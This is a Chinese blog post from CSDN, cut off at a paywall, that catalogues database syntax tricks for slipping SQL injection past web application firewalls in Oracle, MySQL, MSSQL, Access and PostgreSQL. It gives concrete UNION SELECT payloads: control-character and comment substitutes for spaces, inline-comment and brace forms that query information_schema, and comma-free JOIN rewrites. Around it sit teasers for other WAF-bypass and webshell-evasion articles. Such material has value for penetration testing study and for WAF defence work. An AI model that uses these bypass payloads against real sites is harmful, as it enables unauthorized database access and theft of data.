数据库语法整理及WAF绕过方式

最新推荐文章于 2024-03-26 20:12:43 发布
最新推荐文章于 2024-03-26 20:12:43 发布
阅读量2.2k 收藏 5
点赞数
分类专栏: 渗透测试 文章标签: 数据库 postgresql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuoLi_s/article/details/120562151
版权

数据库语法整理及WAF绕过方式

原文链接请点击:https://www.cnblogs.com/ruoli-s/p/15355611.html

关系型数据库

关系型数据库:指采用了关系模型来组织数据的数据库。

直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织

当今主流的关系型数据库有:OracleMicrosoft SQL ServerMySQLPostgreSQLDB2Microsoft AccessSQLiteMariaDB

Oracle

Oracle特性:

select id,contents,time from news where news_id=1unionselect1,2,db_name()from ⑤ admin

  • 位置一

    • 可利用其他控制字符替换空格:%00%09%0a%0b%0c%0d
    • 可利用其他符号:.

  • 位置二

    • 可利用其他控制字符替换空格:%00%09%0a%0b%0c%0d

  • 位置三

    • 可利用其他控制字符替换空格:%00%09%0a%0b%0c%0d
    • 可利用其他符号:+-%ad

  • 位置四

    • 可利用其他控制字符替换空格:%00%09%0a%0b%0c%0d

  • 位置五

    • 可利用其他控制字符替换空格:%00%09%0a%0b%0c%0d
    • 可插入字符:%24、`%30-%ff

MySQL

MySql语法:

  • 绕过逗号过滤
原码:union select 1,2,3,4;
绕过:union select * from (select 1)a JOIN (select 2)b JOIN (select 3)c JOIN (select 4)d;

MySql特性:

select id,contents,time from news where news_id=1unionselect1,2,db_name()from ⑤ admin

  • 位置一

    • 可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0
    • 可利用注释符号:/**/#--+
    Select/**/*/**/from/**/[dbo].[Users]/**/where id =1
    • 可利用数学运算以及数据类型:news_id=1.1,news_id=1E0,news_id=\N

  • 位置二

    • 可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0
    • 可利用注释符号:/**/#--+
    • 可利用括号 :union(select 1,2)

  • 位置三

    • 可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0
    • 可利用注释符号:/**/#--+
    • 可利用其他符号:+-~@

  • 位置四

    • 可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0

    • 可利用注释符号:/**/#--+

    • 可利用数学运算以及数据类型:union select user(),2.0from admin

      ​ union select user(),8e0from admin

      ​ union select user(),\Nfrom admin

  • 位置五

    • 可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0
    • 可利用注释符号:/**/#--+

  • 全局位置

    • 可利用 反引号 号:
    union select 1 schema_name from `information_schema.SCHEMATA` limit 0,1)
    • 可利用内联注释:
    union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/ limit 0,1)
    • 可利用{}号:
    id=1 union select 1,(select(schema_name)from {x information_schema.SCHEMATA} limit 0,1)
    • 可利用()号:
    id=1 union select 1,(select(schema_name)from(information_schema.SCHEMATA) limit 0,1)

MSSQL

MSSQL特性:

select id,contents,time from news where news_id=1unionselect1,2,db_name()from ⑤ admin

  • 位置一

    • 可利用其他控制字符替换空格:%01~%0F%11~%1F
    • 可利用注释符号:/**/
    • 可利用数学运算以及数据类型:news_id=1.1,news_id=1e0,news_id=1-1

  • 位置二

    • 可利用其他控制字符替换空格:%01~%0F%11~%1F
    • 可利用注释符号:/**/
    • 可利用冒号:union:slect

  • 位置三

    • 可利用其他控制字符替换空格:%01~%0F%11~%1F
    • 可利用注释符号:/**/
    • 可利用其他符号:+-~:.

  • 位置四

    • 可利用其他控制字符替换空格:%01~%0F%11~%1F

    • 可利用注释符号:/**/

    • 可利用其他字符:%80~%FF

  • 位置五

    • 可利用其他控制字符替换空格:%01~%0F%11~%1F

    • 可利用注释符号:/**/

    • 可利用冒号:union:select

    • 可利用其他字符::.%80~%FF

Access

Access特性:

select id,contents,time from news where news_id=1unionselect1,2,db_name()from ⑤ admin

  • 位置一

    • 可利用其他控制字符替换空格:%09%0a%0c%0d%16

  • 位置二

    • 可利用其他控制字符替换空格:%09%0a%0c%0d

  • 位置三

    • 可利用其他控制字符替换空格:%09%0a%0c%0d
    • 可利用其他符号:+-.=

  • 位置四

    • 可利用其他控制字符替换空格:%09%0a%0c%0d

  • 位置五

    • 可利用其他控制字符替换空格:%09%0a%0c%0d

PostgreSQL

数据库特性

  • Postgresql 字符串
    • Postgres 输入的所有字符串都被认为是 Unknown 类型
  • Unknown 类型有两种输入模式:
    • 单引号转义模式;
    • 美元符逃逸模式;
  • 在单引号转义模式中允许使用前缀 E/U/B/X 表示转义字符串/Unicode 字符串/位串。
    • 其中 E 表示进行 C 语言风格的转义;
    • U 表示进行 Unicode 转义,并支持自定义转义符;
    • B 和 X 代表后续跟随的是一个 bit 序列;

PostgreSQL特性:

select id,contents,time from news where news_id=1unionselect1,2,db_name()from ⑤ admin

  • 位置一

    • 可利用其他控制字符替换空格:
最低0.47元/天 解锁文章
RuoLi_s
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Acesss数据库手工绕过通用代码防注入系统
weixin_34124939的博客
05-19 232
Acesss数据库手工绕过通用代码防注入系统By antian365 残枫 simeon    ***过程就是各种安全技术的再现过程,本次***从SQL注入点的发现到绕过sql注入通用代码的防注入,可以说是打开了一扇门,通过sql注入获取管理员密码,获取数据库,如果在条件允许的情况下是完全可以获取webshell。在本文中还对access数据库获取webshell等关键技术进行了总结。1.1获取目...
40. 注入篇——绕过WAF继续注入
Fly_鹏程万里
03-10 1078
1.WAF过滤机制:1.异常检测协议–拒绝不符合HTTP标准的请求; 2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证; 3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题; 4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活; 5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄露保护等...
常见绕过方法总结
最新发布
weixin_66839513的博客
03-26 1057
两个空格代替一个空格,用Tab代替空格,%a0=空格。绕过的替代类型:%20 --代表url编码的空格,在空格过滤时可以代替。%09--用于在输出或显示文本时在该位置产生一个固定的水平间距,类似于tab键。%0a--代表换行符%0b--用于在输出或显示文本时在该位置产生一个固定的垂直间距,类似于tab键。%0c--%0d--回车换行%a0--代表的是非断行空格%00--%00代表的是ASCII码中的空字符/**/可以将空格字符替换成注释/**/,也可以使用内联注释,/!code。
记一次iis+aspx环境下利用http参数污染绕过waf
zhangge3663的博客
07-27 1232
环境介绍 Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0. waf: 某不知名waf 漏洞点情况 新建模板处,可以直接写入内容到文件: 但是一写入正常的aspx语句就被拦截,连简单的输出语句都不行: bypass过程 一开始也试过诸多绕过方法,包括各种常见编码、chunked编码等等,都不太行。 然后尝试了一下,看有没有http参数污染(两个code参数): 访问下生成的aspx文件: 可以看到确实是可以的,但是中间
shell 免杀aspx_[9期]软WAF上传绕过+webshell免杀
weixin_42311335的博客
12-31 250
安全狗上传绕过思路:1.扰乱编码form-data 替换成 ~form-data form-data 改成f+orm-dataform-data 改成form-d+ata form-data 替换成 "filename="xxx" 改成filename=xxx;增减空格对Content-Disposition,Content-T...
%0a php,%0a(换行符)的执行解析过程
weixin_29801567的博客
03-31 1267
test.php文件的代码如下://var a = "";//var a = "start_%0a_end";情况1:变量a的值是可控的,由参数input决定,所以,当从浏览器访问:http://127.0.0.1/test.php?input=start_%0a_end的时候查看网页源代码,结果如下://省略……//var a = start__end;//var a = "start_%0a_...
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
长亭waf绕过1.pdf
07-09
长亭waf绕过1
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
asp %0D%0A换行问题
东亮博客
07-09 5419
Function SecTrim(s1)  SecTrim = Replace(Trim(s1),Chr(13)&Chr(10),"")  End Function
SQLi-LABS Page-2 (Adv Injections)
qq_61774705的博客
08-09 514
mysql
log4j 安全问题验证demo & CRLF注入漏洞
weixin_42299862的博客
12-31 7665
一、环境准备 https://blog.csdn.net/weixin_42299862/article/details/111993837 二、demo 1、使用 @Log4j2 log.error() 打印异常日志是否会泄露敏感信息? https://www.cnblogs.com/huanghuanghui/p/11775731.html https://www.cnblogs.com/qlqwjy/p/7192947.html 代码如下 如果有红线语法错误,参考https://blog.csdn.n
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
CTFshow之36Dweb做题记录
bmth666的博客
08-08 2206
WEB_给你shell 打开题目首先F12,得到信息 那么?view_source=flag.txt得到了源码: <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset(...
wuyun知识库目录
Grey的博客
01-15 7199
1269.利用Office宏及Powershell的针对性攻击样本分析2016-06-24 1268.SQL注入关联分析2016-06-24 1267.Android安全开发之ZIP文件目录遍历2016-06-23 1266.search-guard 在 Elasticsearch 2.3 上的运用2016-06-23 1265.签名加密破除-burp插件在app接口fuzz中的运用201
干货|2020渗透测试面试问题大全 建议收藏
RuoLi_s的博客
01-28 2万+
转自HACK之道 乌雲安全 渗透篇 0.渗透测试知识体系结构 1、介绍一下自认为有趣的挖洞经历 挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者会想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击网络犯罪获得权限、传销数据、组织架构,服务器权限、等… 2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? SQL注入、密码组合,前者防护分为
WAF详解及WAF绕过
赤赤三的博客
03-20 8616
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
waf绕过cookie
08-09
WAF绕过Cookie主要是通过修改请求方式或使用复参数绕过的方法。其中,修改请求方式是最常见且典型的绕过方式。在一些ASP或ASPx网站中,WAF可能对GET请求进行了过滤,但对Cookie甚至POST参数没有进行检测。因此,攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值